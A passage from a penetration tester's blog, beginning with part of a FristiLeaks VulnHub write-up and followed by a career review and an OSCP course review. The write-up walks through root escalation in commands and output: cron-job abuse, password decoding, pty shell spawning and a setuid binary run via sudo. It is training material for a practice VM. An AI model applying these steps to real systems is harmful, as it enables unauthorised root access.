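The upload weakness discussed above, as an added example that is not code from the write-up or from the FristiLeaks VM: an extension-only check of the kind that accepts reverse-shell.php.jpg, beside a hardened check that rejects double extensions, verifies the leading bytes and picks a server-side name. Function names, the allow-list and the magic-byte table are my own assumptions.

```python
"""Added example, not code from the write-up or the FristiLeaks VM.
Contrasts an extension-only upload check with a hardened one.
Function names, the allow-list and the magic-byte table are assumptions."""
import os
import re
import secrets
from typing import Optional

ALLOWED_EXT = {"png", "jpg", "gif"}

# Leading bytes of each allowed image type (constructed table for the example).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """The kind of check the write-up bypasses: it only looks at the last
    extension, so 'reverse-shell.php.jpg' is accepted.  On an Apache/mod_php
    host configured to handle '.php' anywhere in the name, that file is
    still executed as PHP."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def hardened_check(filename: str, content: bytes) -> Optional[str]:
    """Return a server-chosen filename, or None to reject the upload.

    Rules: strip any path component, allow exactly one extension (so
    'a.php.jpg' is rejected), require the extension to be on the
    allow-list, require the file's leading bytes to match that extension,
    and never reuse the client-supplied name on disk."""
    base = os.path.basename(filename)
    parts = base.split(".")
    if len(parts) != 2:
        return None
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return None
    if not content.startswith(MAGIC[ext]):
        return None
    # Random name: the stored path cannot be predicted or chosen by the uploader.
    return f"{secrets.token_hex(16)}.{ext}"
```

Storing the accepted file outside the web root, or in a directory where script execution is disabled, closes the remaining gap even if a polyglot image slips past the byte check.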
Now you have a low privileged shell as user apache.

PRIVILEGE ESCALATION

As expected of a PHP reverse shell, the display is bad. It will repeat the characters, so the commands in screenshots from this point onwards may not be as accurate as they should be, but I will write the same commands in the write-up, so don't worry about it. Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I would be digressing too much. Let us go straight into finding the interesting information on this machine! The first thing you need to know is the environment that you are in. Run your favourite enumeration scripts, or you can do it manually based on this guide written by g0tmi1k. It has been super useful during my journey towards obtaining the OSCP certification.
KERNEL INFORMATION:
Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015

SPECIFIC RELEASE INFORMATION:
CentOS release 6.7 (Final)

INTERESTING SYSTEM USERS:
root:x:0:0:root:/root:/bin/bash
eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash
fristi:x:503:100

PERMISSIONS IN /HOME DIRECTORY:
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 ..
drwx------. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod

NETWORK INFORMATION:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.117.135:41116 192.168.117.134:8888 ESTABLISHED 3001/sh
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 ::ffff:192.168.117.135:80 ::ffff:192.168.117.13:43296 ESTABLISHED -

SOFTWARE VERSIONS

Sudo version:
Sudo version 1.8.6p3

MySQL version:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1

Apache version:
Server version: Apache/2.2.15 (Unix)
Server built: Aug 24 2015 17:52:49

In the above information, in your opinion, which are the most interesting ones?
For me, I would like to check the user directories:

cd /home
ls *

Notice anything interesting in the output?
.
.
.
Yes, you are probably right: let's check out the text file at /home/eezeepz/notes.txt

cat /home/eezeepz/notes.txt

Yo EZ,
I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/
Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges.
- Jerry

Nice. Now we know that Jerry has put some useful binaries in his directory at /home/admin, and we can execute those binaries under his (root) privilege by creating a file called "runthis" in the /tmp/ directory. Let's see if we can spawn a reverse shell with root privilege using this cron job!

Set up a listener just like before and create the "runthis" file.

It did not work.

Every minute, the cron job executes the commands in runthis and updates the cronresult file located within the /tmp/ directory. The current result is the following:

command did not start with /home/admin or /usr/bin

As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method. Just to test it out, let's try running the following command to verify that the cron job is working fine:

/home/admin/chmod 777 /home/admin

So apparently, it works!

total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

Awesome! Now we can read the content of the /home/admin directory.

bash-4.1$ ls -l
total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt

Here are some interesting files that can be identified in the /home/admin directory:
* cryptpass.py
* cryptedpass.txt
* whoisyourgodnow.txt

First, the content of cryptpass.py:

bash-4.1$ cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    # base64-encode the input, reverse the result, then apply rot13
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult

Next, the content of cryptedpass.txt:

bash-4.1$ cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq

Lastly, the content of whoisyourgodnow.txt:

bash-4.1$ cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

It is not difficult to guess that the Python script was used to produce the content of cryptedpass.txt and most likely also whoisyourgodnow.txt. Based on the source code of cryptpass.py, I wrote a decode function to do the reverse of cryptpass.py; let's call it decryptpass.py. Here's the full source code: https://gist.github.com/kongwenbin/8551e2665f6be6e7083a182efbb7f10e By the way, I wrote the script locally before transferring it over using wget. Please feel free to write it directly on the machine to your liking!

After executing the commands, you will get the 2 passwords for each of the "encrypted" texts from before.

* mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123
* =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi!

I am very sure that LetThereBeFristi! is the password for user "fristigod".
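The decode step described above, as an added example that is not the author's gist: a Python 3 version of the cryptpass.py transform (base64, reverse, rot13) together with its inverse, so the two values found in /home/admin can be checked offline. Function names are my own.

```python
"""Added example, not the author's decryptpass.py gist: a Python 3
re-implementation of cryptpass.py's transform and its inverse.
Function names are assumptions."""
import base64
import codecs


def encode_string(plain: str) -> str:
    """Same steps as cryptpass.py: base64, reverse the string, then rot13."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(crypted: str) -> str:
    """Inverse of encode_string: undo rot13 (it is its own inverse),
    reverse the string back, then base64-decode.
    Raises ValueError if the input is not a cryptpass.py value."""
    reversed_b64 = codecs.decode(crypted, "rot13")[::-1]
    try:
        return base64.b64decode(reversed_b64, validate=True).decode()
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"not a cryptpass.py value: {crypted!r}") from exc


if __name__ == "__main__":
    # The two file contents found in /home/admin on the VM.
    for value in ("mVGZ3O3omkJLmy2pcuTq", "=RFn0AKnlMHMPIzpyuTI0ITG"):
        print(f"{value} -> {decode_string(value)}")
```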
Let's continue our privilege escalation, this time to "fristigod", since it is the only folder within the /home directory that we do not have any access to until now. Something inside there might give us root access. Run the following command to switch user to fristigod:

su - fristigod
standard in must be a tty

This happens because this is not a full shell. To resolve this issue, simply spawn a tty yourself (straightforward enough).

python -c 'import pty;pty.spawn("/bin/bash")'
su - fristigod
Password: LetThereBeFristi!
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Nice, we are now user "fristigod"! Once again, check our home directory:

pwd
/var/fristigod
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

Noticed something interesting? There is a directory named .secret_admin_stuff

cd .secret_admin_stuff
ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 ..
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom

./doCom
Nice try, but wrong user ;)

As kindly hinted by the error message, I might be using the binary in the wrong way. Let's try to find out more about the usage of this doCom, as this is most likely the gateway to make us root. It can already run programs as root (see its permissions!). Let's review the /var/fristigod/.bash_history file to find clues on how to use the doCom file.

cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom less /var/log/secure eF
exit
exit
exit

Did you notice that the "fristigod" user is always running the following sudo command?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Seems like we have to run that same command as well before we can attempt to execute any other commands. To verify this, simply run the following command:

sudo -l
Let's try it out:

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Wow, that was amazing. So, what else can I run? If I can run the id command like above, can I directly spawn myself a shell?

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Perfect! Now we can go to the /root directory to check out the flag.

cd /root
ls -la

… VulnHub VM!
Thanks for following my write-up. I hope that it has been useful to you and helped you learn something new, be it the thought process or the approach towards hacking a box like this. Also, I would say that this is a very good practice machine for folks who intend to take up the OSCP certification. If you are still on the verge of deciding, check out my OSCP/PWK course review; it might be helpful to you. Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload CTF-like practice VMs for the community. If you like this write-up, do also check out my other write-ups on the Kioptrix series as well.

* Write-up for Kioptrix: Level 1 (#1)
* Write-up for Kioptrix: Level 1.1 (#2)
* Write-up for Kioptrix: Level 1.2 (#3)
* Write-up for Kioptrix: Level 1.3 (#4)
* Write-up for Kioptrix: 2014 (#5)
A REVIEW OF MY PAST ONE-YEAR IN INFORMATION SECURITY
November 5, 2017
Wen Bin KONG
General, Reviews
Last week, I had my one-year anniversary in the Information Security industry, doing work related to the offensive aspect of security. Surprisingly, it has already been a year since I left my previous role at a local bank and pursued my interest in Information Security. Time really flies… The purpose of this blog is to document my learning journey, but I have neglected it for a few months due to a hectic workload from various sources; however, the good news is that I have decided to consciously remind myself to update it more often moving forward! Well, make it a "new year resolution"! Now, back to the review…

WORK

Being part of an awesome team at Vantage Point Security, I have been given the opportunity to perform technical security assessments on various organisations in Singapore as a qualified Security Consultant. I was privileged to perform manual penetration testing on various types of web and mobile applications that belong to renowned organisations, such as some of the best financial institutions and telecommunication companies in the region. Something interesting is that I am usually a customer of my clients, which makes me really appreciate it when I see them taking security seriously and striving to improve for the better. Overall, I find it very meaningful to be part of this ecosystem in making products better and safer for people; it makes me appreciate the things I am doing and keeps me going!

A special shout-out to my mentor, Paul Craig, Sven Schleier, Jin Kun and Ryan Teoh for making my past one-year such an awesome journey of learning! I have learnt so much from them. It is always great to be able to work alongside people who are motivated and passionate about security. I am looking forward to doing even greater stuff together in the year ahead!

Always ready to give a high-five to fellow security enthusiasts!

CERTIFICATIONS
I have managed to achieve the very first milestone of most penetration testers, Offensive Security Certified Professional (OSCP), after having completed 3 months of intensive hands-on lab practice in its recommended course, Penetration Testing with Kali (PWK). I have also written a blog post about my experience gained during the 3-month period, in the hope that it will be helpful to fellow like-minded aspiring security enthusiasts. If you are interested, please check out My OSCP / PWK Course Review.

Besides OSCP, I have also gotten myself the following certifications in the past one-year:

* CREST Practitioner Security Analyst (CPSA)
* CREST Registered Penetration Tester (CRT Pen)
* EC-Council Certified Ethical Hacker v9 (CEH)

> "CREST is a not for profit organisation that serves the needs of a technical information security marketplace that requires the services of a regulated professional services industry." ~ directly quoted from CREST

From my observations, I see that CREST has been very successful in becoming the go-to quality assurance organisation in Singapore when it comes to selecting vendors to work with, be it for government agencies, financial institutions or organisations from other industries. Something I like about them is that they conduct proctored examinations, which can solve a lot of "problems" caused by people with no ethical values. It is a huge problem occurring around the world, which I am not going to cover in this post; maybe next time (I have got to stay on track!). To me, certification is one of the many forms of (technical) quality assurance that a consultant can provide to their clients before engaging them on any security assessment projects. While being certified is a good thing, quality is always better than quantity. It is essential to put the skills you learnt into practice, or it will be just another piece of paper.

If you don't put your skills into practice, it will just be another piece of paper
BUG HUNTING
My experiences in bug hunting have been some of the most devastating yet delightful moments of my past one-year. When I learnt about the existence of "Bug Bounty Programs" (e.g. Bugcrowd and HackerOne), I was both surprised and excited, thinking how fun it could be to find bugs on the internet and get rewarded for it. It sounded really enticing at first, especially with the thought that since I have been testing web and mobile applications to earn a living, it should be easy for me. However, it didn't take long for me to realise how naive I was to even think that way; we are talking about the internet, man! Any low-hanging fruit would have already been discovered by someone else; there is nothing left lying around for me to "hunt".

Well, I thought it would be easy, but…

On a positive note, this simple realisation has motivated me to keep up my pace in learning all kinds of "new stuff" happening on the internet, such as researching the security mechanisms and implementation of various popular web applications, development frameworks, content management systems, penetration testing techniques such as bypassing a Web Application Firewall (WAF), etc., and much more interesting stuff.

Nowadays, I still do bug hunting whenever I get some free time before I turn in for the night, or during some random weekends. Did you notice that I call it "Bug Hunting" instead of "Bug Bounty"? That is because I don't only focus on programs that give monetary rewards to security researchers. I work on any programs that I find meaningful and reasonable to test, such as companies whose products I personally use or companies that give a clearly defined scope in their Responsible Disclosure or Bug Bounty Programs.

Just playing my part in making the world a better place

While it may sound cheesy to say that I want to make the world and the internet a safer place for everyone, sometimes people just want to do things that they themselves feel are meaningful, worthwhile, and make themselves feel good. Personally, finding bugs, disclosing them responsibly to the vendor and getting them fixed is something that makes me feel that way. I am still learning and trying to get better every day. I urge all aspiring bug hunters to create a Twitter account, start following fellow bug hunters and learn from one another. As mentioned earlier, I will start posting more write-ups in my next one-year, so stay tuned! Besides reading the write-ups from fellow bug hunters, I also recommend reading the publicly disclosed bugs from sources such as the HackerOne Hacktivity or other unofficial sources such as this and this. One of the best bug bounty tips that I have come across so far is to keep trying, keep learning, and never give up.

Keep learning, and never give up.

I have had my fair share of achievements over the past one-year and I feel really honoured to be recognised by the following 10 organisations and have myself listed on their Security Researcher Hall of Fame:

* Netflix
* Nokia
* Adobe
* Sophos
* CERT-EU
* Bitdefender
* Jet.com
* Schuberg Philis
* Silent Circle
* Constant Contact
While I cannot disclose the details of the vulnerabilities that I have discovered, I might write a blog post next time on some of them, with all information masked, of course.

Official recognition from Netflix

SECURITY RESEARCH

> Life is full of challenges, it is how you respond to them that makes a difference to your life ~ Source

We security folks always challenge ourselves in many things: some people challenge themselves to earn 50k in slightly over 1 month, some people challenge themselves to earn 30k in 30 days; we all like to set milestones and work towards them. For me, I am not at their level yet, but one year ago, I told myself that I want to find a zero-day too. It seemed impossible at first, but I was inspired by one of my colleagues, Bernhard Mueller, during one of the project engagements that we did together, and it made me feel that I could do it too. The influence is real. I would download the same software or application development framework and look for zero-days; this is something that I would not have done in the past. He has also written an article about why you should be looking for zero-day vulnerabilities during penetration testing.

As time goes by, it has become a habit for me to look for zero-days during penetration testing engagements as well.

Recognition from TIBCO for CVE-2017-5528

Of course, it is easier said than done. Most of these commercial and/or open source software products were already thoroughly tested prior to their release, so it is very difficult to find any legitimate bugs in them. I have gone through my fair share of hardships, gained tons of knowledge along the way as I constantly failed, and was ultimately lucky to have found a few zero-day vulnerabilities in some commercial products used by large enterprises.

* CVE-2017-5528 – TIBCO – JasperReports Server cross-site vulnerabilities

It is worth mentioning that TIBCO is an organisation that values security. They take security reports seriously and reply promptly to security researchers. It was great communicating with them.

* CVE-2017-8042 – Pivotal – Stored Cross-site scripting (XSS) vulnerability in Spring Batch Admin before 1.3.0
* CVE-2017-8043 – Pivotal – Cross-site request forgery (CSRF) vulnerability in Spring Batch Admin before 1.3.0

Both of the above issues were reported in March 2017, and Pivotal has confirmed that they will not be addressing them as the software is going to reach End-Of-Life (EOL) by the end of 2017. The recommendation is for users to migrate to another product, Data Flow. They have recently put up a notice too. Currently, both CVE trackers are pending Pivotal publishing them online; they have not confirmed a date yet. While they were not high-severity vulnerabilities that could lead to Remote Code Execution (RCE), they were good enough as a start for me. They were genuine bugs in the software, undiscovered and hence left exploitable by malicious attackers, and my research/report did help the software company to improve their products, which are used by many enterprises all over the world.

Good enough, but try harder next time, don't be contented. It's only a start.

Next up is an interesting bug that I found while working on one of the private BB programs. They are using the PRTG Network Monitor, which is an application that helps organisations to monitor their systems, devices, traffic and applications using common technologies like SNMP, WMI, SSH, and many more. I shall refrain from providing too much information for now; maybe a write-up after the latest version and release notes have been officially released.

* CVE-2017-????? – Paessler AG – pending security patch and release notes
Photo of myself at the Cybersecurity Camp @ Singapore 2017 – Source

Lastly, I attended the Cybersecurity Camp @ Singapore 2017, which was organised by the Singapore Cybersecurity Consortium (SGCSC) earlier this year, and learnt about fuzz testing for finding vulnerabilities. Having been equipped with this knowledge and its theoretical understanding for a few months, I finally put it into practice after being encouraged by Jin Kun, as he shared his own success story of having discovered many zero-day vulnerabilities through fuzzing. Being inspired and motivated to do my own fuzzing as well, I learnt many things along the way, specifically how to fuzz an application efficiently, how to fuzz an application library, how to optimise my virtual machine processes for better performance, how to fine-tune my fuzzer, how different fuzzers mutate or identify different paths within an application flow, how to compile binaries using different compilers and build systems, how to analyse a crash, and many more interesting things that I never thought I would learn. After some time of fuzzing, I discovered 3 CVEs in BinChunker; the issues have been fixed and changes are being pushed to various Linux distros as I am writing this blog post.

* CVE-2017-15953 – BinChunker – Heap-based buffer overflow
* CVE-2017-15954 – BinChunker – Heap-based buffer overflow
* CVE-2017-15955 – BinChunker – Memory Access Violation

There will be a short write-up on this soon. While BinChunker is not a very popular tool based on Debian popularity contest statistics, and there was no RCE exploit developed for the discovered vulnerabilities, it was very satisfying. I really enjoyed the experience, from discovering these vulnerabilities to reporting them and eventually getting them fixed. It's great to see how people react to and appreciate the findings you discovered and then work together to fix the problem as a team. Information Security is a super awesome community where people help one another to make things better!

COMMUNITY PROJECTS
Have you checked out the OWASP Mobile Security Testing Guide (MSTG) already? If you have not, then you probably should.

The MSTG is a comprehensive manual for mobile application security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Verification Standard (MASVS). You can also read it on Gitbook or download it as an e-book.

Main Deliverables of the OWASP Mobile Security Testing Guide

I was fortunate to work alongside the project leaders of the MSTG at work, and since I knew nothing about mobile application security testing back then, I was highly encouraged by Bernhard to use the MSTG as my "study material"; if I found anything missing, I could research it separately and contribute to this community project by submitting a pull request. Well, it makes sense: since I am going to research those things to learn anyway, why not share the knowledge with the community and help fellow aspiring security enthusiasts in their learning as well?

With consistent contribution of quality content for a few months, I am humbled to be acknowledged as one of the "Top Contributors" for the OWASP MSTG project. If you are someone who is interested in mobile application security, I highly encourage you to read through the content and create a pull request if you find anything missing. Once you start submitting those pull requests, they can become quite addictive.
ACADEMIC
This is the last section of the review. Some of my friends know that I am currently a part-time student enrolled in the Master of Computing (Infocomm Security) at National University of Singapore (NUS). My first semester was hectic, having not studied an academic syllabus since graduating in 2014; however, things went well thanks to the support of family and friends (special shout-out to Zhan Teng, Julian Tan and Jiqing for being super awesome teammates!). The second semester is coming to an end soon and of course, with tons of submission deadlines to meet in the next few weeks and a few exams to clear!

Android Booting Process

Other things worth mentioning are some of the more interesting homework that I did this semester for one of my modules, CS5231 – System Security, taught by Professor Liang Zhenkai. Usually when I root an Android device, I use readily available tools and do not have a clear understanding of what really happens under the hood. In order to complete one of the tasks in the homework, I was forced to step out of my comfort zone and dive into how Android really works, how the rooting of Android is performed and what the various methods to root an Android device are, and eventually I also created my own custom Over-The-Air (OTA) package to perform code execution as root: to fire up my own daemon service that can spawn a root shell to my client upon request.

CONCLUSION / TO-DO FOR THE NEXT YEAR

Without realizing it, this blog post has turned out to be a long article. Personally, I find it worthwhile and meaningful to just sit down, think through and review what I have done in my past one year in the information security industry. I feel that everyone should do something similar and then think about what they want to do in the next one year.

Think about some of the things that you want to achieve in the next one year
The reason for me to post this article is also to put some pressure on myself and make sure that I achieve the goals which I said I want to achieve in the next one year. Next year, I am going to look back at this article and question myself. In the next one year, I intend to work on other CREST certifications, such as the CREST Certified Infrastructure Tester (CCT INF) and/or CREST Certified Web Applications Tester (CCT APP). Like I mentioned above as well, I like how they conduct proctored examinations here in Singapore and I find that they can be great milestones to challenge myself with in the next one year. Another certification which I am looking forward to challenging myself with is the Offensive Security Certified Expert (OSCE), for which I intend to sign up for its course, Cracking the Perimeter (CTP), in the next few months.

I need to try harder! #TryHarder I got to try harder!

In view of the OSCE certification goal, I hope to focus more on low-level stuff, such as improving my exploitation techniques, exploit development skills, etc., which are things that I don’t have much experience with now, but are useful skills which I am very keen to pick up.
In the next one year, I hope to continue to hunt for bugs and keep up with the learning. I also aim to post write-ups on any interesting bugs, if I am given the permission to do so. Other things are write-ups on CTF labs such as the Bandit from OverTheWire and practice machines such as Kioptrix from Vulnhub.
For work, apart from Web Application and Mobile Application penetration testing, I hope that I can have opportunities to gain more exposure across the Asia region and get myself involved in different types of engagements, such as ATM Hacking, Red Teaming and Wireless Hacking. There are so many things to learn, I can’t wait anymore! I need to be more productive…

I also aim to develop my own Burp Extender module that can help to improve my productivity. At least my first extender module should not be too complicated; I just need to get started with something, start small, and gain the knowledge and momentum before targeting something more complicated. If you have any interesting ideas that are not too complicated, please share them in the comments section.

Lastly, as part of my Master’s course requirements, I need to complete a one-semester-long research project (3 months’ duration). I can choose between an academic project proposed by one of the NUS professors, or an industrial project proposed by a company in the industry. I have not chosen any topics yet, but I hope that I can work on something useful to my field of work, to not only clear my course requirements, but also allow me to learn practical techniques and knowledge that are relevant to my area of interest. That way, I will have enough interest to continue to work on it after the 3-month duration. If there are any potential projects related to the offensive side of security that are not too complicated/simple, I would love to know about them.

If you have read this entire post, you deserve a medal, just like this camera man
I hope that the next one year will be even better and full of learning opportunities for me! Till I blog again.
MY OSCP / PWK COURSE REVIEW
February 23, 2017 / November 5, 2017, Wen Bin KONG
Categories: General, Resources, Reviews, Tips
Tags: certification, certs, exams, oscp
It has been a tough 3 months of virtual lab and hands-on training – so much learning, and I mean, _intensive learning_; combined with many sleepless nights and so much sweat and tears (maybe not the tears part but you get the point), I have finally passed my OSCP!

I am now officially an Offensive Security Certified Professional! Yes, I tried harder #tryharder

It has been a very tough 3 months of journey, which explains why I have not been blogging anything at all since then. I am happy to be back and blogging once again! Okay, here comes my review about the course, specifically for any fellow aspiring ethical hacker like me, or simply anyone who has a passion for the topic of computer security and wants to learn the technical side of the skill set.

A little bit about myself (for reference to the content below): I graduated from the National University of Singapore (NUS), School of Computing, Bachelor of E-Commerce, in 2014. Since then, I have been working as an IT Infrastructure Project Delivery Manager at a bank. In my role, I basically coordinate the completion of various deliverables for either the upgrading of existing systems or the setting up of new systems. _Up to this point, my job was not security related._ To pursue my interest in information security, I left my job. I took up training courses and obtained my EC-Council Certified Ethical Hacker (CEHv9) certification during September 2016. Ever since then, I have been doing a lot of self-learning on IT security stuff, especially through hands-on self-training by hacking the Virtual Machines downloadable from Vulnhub; you can read some of my write-ups over here.
Before you sign up for the OSCP course, it is essential to plan your time well! I made a mistake so I’d like you to learn from it. First, you have to know that to obtain the OSCP certification, you will need to register yourself for the Penetration Testing with Kali (PWK) course. The course consists of a virtual lab environment, of which the credentials will be sent to you (along with the training manual and videos) after you have successfully registered for the course.

The mistake which I made was to directly plan for a nice weekend (and a week with less work) to sign up for the course, thinking that I could get started immediately. Listen/read: YOU WILL NOT START THE COURSE IMMEDIATELY. Courses will only start on certain days of each week, and each week can only have a limited number of students start their PWK course, depending on the sign-up rates, which will not be disclosed by Offensive Security. In my case, the earliest I could get started back then was 2 weeks after I had signed up for the course. Notice the mistake here? I totally expected myself to be able to get started right after I signed up!

With the above mistake and poor time management at the start, I spent several days on the PDF lab manual exercises and the training videos. For reference, I started working on the lab machines 2 weeks after my PWK course commenced. Many people would recommend that you jump straight into the lab and not waste any time. I would like to disagree partially. While I believe that you could learn faster by jumping straight into the lab, there are some skill sets which you have to pick up before just jumping in. Personally, I find that you should go through the chapter of the lab manual regarding the various methods for file transfer. You should not miss the chapter on buffer overflow too; that is very important, as it teaches you how to craft your own simple fuzzer and shellcode and modify the exploit. The fundamental enumeration techniques are very important too, specifically the chapter on using tools like nmap. Essentially, my point is — DON’T JUST JUMP INTO THE LAB UNLESS YOU KNOW WHAT YOU ARE DOING. Learn the basics, and then jump in to try out the tools. When things are not right, jump out again.
That is the whole point of the lab — for you to practice what you learnt and not just study the theory. Regarding the learning curve, I must say that it really takes time to get your very first shell, and it gets really addictive. Personally, it took me quite a while to get my first shell even though it was just simply running the Metasploit tool. Don’t know about Metasploit? Fret not, it will be covered in the lab manual. Or you can complete the Metasploit Unleashed Free Ethical Hacking Course, like I did. It was good learning as well and, most importantly, it is an Own Time Own Target (OTOT) kind of free online course. Be patient, shells will come, you just need to try harder, don’t give up.

Thanks to the advice and encouragement from my mentor (Paul, that’s you), I took up the challenge of hacking PAIN as my 10th machine. For those who don’t know what that means — Pain is one of the “boss” machines in the OSCP lab environment, along with his buddies: Sufferance, Humble and Gh0st. Hacking Pain as my 10th machine was no easy task. But like I said, I tried harder; it took me 8 days to root it. No joke, 8 days. Along the way, I learnt a lot of stuff I never imagined myself learning and also never expected myself to be able to understand. Of course, no spoilers, but really, just keep Googling and you will find it, trust me, and trust my mentor. Also, thanks to these 8 days of being stuck on a machine, I kind of got used to the suffering (you know the feeling when you have no shells for a long time) and started to really pick up my pace moving forward.

While I am not going to spoon-feed anyone with any post-enumeration scripts, I must say that you can always write your own scripts, or make use of available resources; there are several very good scripts around, for you to find out. One piece of advice though: DON’T JUST USE THEM BLINDLY. My peers Jin Kun and Ryan Teoh advised me the same when I was happily using the downloaded scripts initially too. There are cases where information is not presented to you directly, or when the operating system is not identical to the script’s target. In those cases, what are you going to do? Are you going to modify your script, do it manually, or give up? We never give up, so we have to understand what the script is doing. If you don’t understand it, don’t use it. Learn. It’s the same as Metasploit exploits — you run it, get shell, yay.
Next, you should first try to understand why that happened and try to get the same result without using Metasploit. The good thing is that in each of the Metasploit modules, you can run the command ‘info’ to read its description, and you can read the source code of the modules directly in the “_/usr/share/metasploit-framework/modules_” directory. Like many people would have also shared with you, for privilege escalation, the only reference notes which you may need are probably just these lists for Windows and Linux respectively. Learn and understand them and you are good to go.

At the end of my lab time, I managed to make my way all the way into the Administrative department (as shown in the image above) and hacked some of the machines in there. During my 3 months of lab time, I managed to root 42 out of the machines. It was not that bad, it is possible, you have to believe in yourself.

Finally, it’s the exam. For those who are not familiar with the exam format, the hands-on exam duration is 23 hours and 45 minutes. There will be several machines for you to attack and get the “flags”. After your time is up, you will be cut off from the exam’s Virtual Private Network (VPN) and you will have to submit a professionally prepared lab report within the next 24 hours. This document should contain the testing process and step-by-step guides on how to replicate the vulnerability and get a shell with the highest system privileges.
